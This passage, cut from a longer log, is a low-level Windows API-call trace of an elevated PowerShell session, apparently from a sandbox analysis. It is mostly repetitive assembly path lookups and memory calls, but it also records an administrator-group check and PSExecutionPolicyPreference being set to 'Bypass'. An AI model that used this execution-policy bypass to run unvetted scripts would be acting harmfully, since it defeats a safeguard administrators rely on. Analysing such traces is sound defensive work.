lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0076.995] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0076.995] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.996] CoTaskMemFree (pv=0x1ef6c0) [0076.999] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0076.999] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.999] CoTaskMemFree (pv=0x1ef6c0) [0076.999] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0076.999] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.999] CoTaskMemFree (pv=0x1ef6c0) [0077.003] CoCreateGuid (in: pguid=0xcd9c8 | out: pguid=0xcd9c8*(Data1=0x678fffc8, Data2=0x9d6e, Data3=0x46b6, Data4=([0]=0x9e, [1]=0xc4, [2]=0x48, [3]=0xd4, [4]=0xee, [5]=0xd2, [6]=0x50, [7]=0x7e))) returned 0x0 [0077.008] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.008] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.008] CoTaskMemFree (pv=0x1ef6c0) [0077.028] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.028] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.028] CoTaskMemFree (pv=0x1ef6c0) [0077.031] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.031] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.031] CoTaskMemFree (pv=0x1ef6c0) [0077.039] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0077.040] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xcd670 | out: lpConsoleScreenBufferInfo=0xcd670) returned 1 [0077.046] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0077.047] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xcd670 | out: lpConsoleScreenBufferInfo=0xcd670) returned 1 [0077.048] GetVersionExW (in: lpVersionInformation=0xcd600*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd600*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0077.051] GetCurrentProcess () returned 0xffffffffffffffff [0077.052] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xcd698 | out: TokenHandle=0xcd698*=0x324) returned 1 [0077.056] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd5b8 | out: TokenInformation=0x0, ReturnLength=0xcd5b8) returned 0 [0077.057] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x16aa30 [0077.057] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x16aa30, TokenInformationLength=0x4, ReturnLength=0xcd5b8 | out: TokenInformation=0x16aa30, ReturnLength=0xcd5b8) returned 1 [0077.058] DuplicateTokenEx (in: hExistingToken=0x324, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xcd718 | out: phNewToken=0xcd718*=0x320) returned 1 [0077.059] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd5b8 | out: TokenInformation=0x0, ReturnLength=0xcd5b8) returned 0 [0077.059] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x16aa60 [0077.059] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x16aa60, TokenInformationLength=0x4, ReturnLength=0xcd5b8 | out: TokenInformation=0x16aa60, ReturnLength=0xcd5b8) returned 1 [0077.060] CheckTokenMembership (in: TokenHandle=0x320, SidToCheck=0x2e0fb48*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xcd728 | out: IsMember=0xcd728) returned 1 [0077.060] CloseHandle (hObject=0x320) returned 1 [0077.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.114] CoTaskMemAlloc (cb=0x804) returned 0x1b8e7080 [0077.114] GetConsoleTitleW (in: lpConsoleTitle=0x1b8e7080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0077.114] CoTaskMemFree (pv=0x1b8e7080) [0077.197] CoTaskMemAlloc (cb=0x804) returned 0x1b8e7930 [0077.197] GetConsoleTitleW (in: lpConsoleTitle=0x1b8e7930, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0077.197] CoTaskMemFree (pv=0x1b8e7930) [0077.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.200] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0077.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0077.395] SetConsoleCtrlHandler (HandlerRoutine=0x28368dc, Add=1) returned 1 [0077.407] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.407] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.407] CoTaskMemFree (pv=0x1ef6c0) [0077.412] SetEnvironmentVariableW (lpName="PSExecutionPolicyPreference", lpValue="Bypass") returned 1 [0077.423] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x328 [0077.425] CoCreateGuid (in: pguid=0xcd810 | out: pguid=0xcd810*(Data1=0x230601a9, Data2=0x1f40, Data3=0x4991, Data4=([0]=0xbc, [1]=0x28, [2]=0xe4, [3]=0xd2, [4]=0xa3, [5]=0x9d, [6]=0x3a, [7]=0xf7))) returned 0x0 [0077.426] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.426] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.426] CoTaskMemFree (pv=0x1ef6c0) [0077.468] WinSqmIsOptedIn () returned 0x0 [0077.469] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.469] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.469] CoTaskMemFree (pv=0x1ef6c0) [0077.471] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.471] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.471] CoTaskMemFree (pv=0x1ef6c0) [0077.471] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.471] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.471] CoTaskMemFree (pv=0x1ef6c0) [0077.472] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.472] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.472] CoTaskMemFree (pv=0x1ef6c0) [0077.473] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.473] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.473] CoTaskMemFree (pv=0x1ef6c0) [0077.484] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.484] CoTaskMemFree (pv=0x1ef6c0) [0077.486] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.486] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.486] CoTaskMemFree (pv=0x1ef6c0) [0077.487] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.487] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.488] CoTaskMemFree (pv=0x1ef6c0) [0077.499] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.499] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.499] CoTaskMemFree (pv=0x1ef6c0) [0077.508] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.508] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.508] CoTaskMemFree (pv=0x1ef6c0) [0077.510] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.510] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.510] CoTaskMemFree (pv=0x1ef6c0) [0077.510] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0077.510] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.510] CoTaskMemFree (pv=0x1ef6c0) [0077.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, 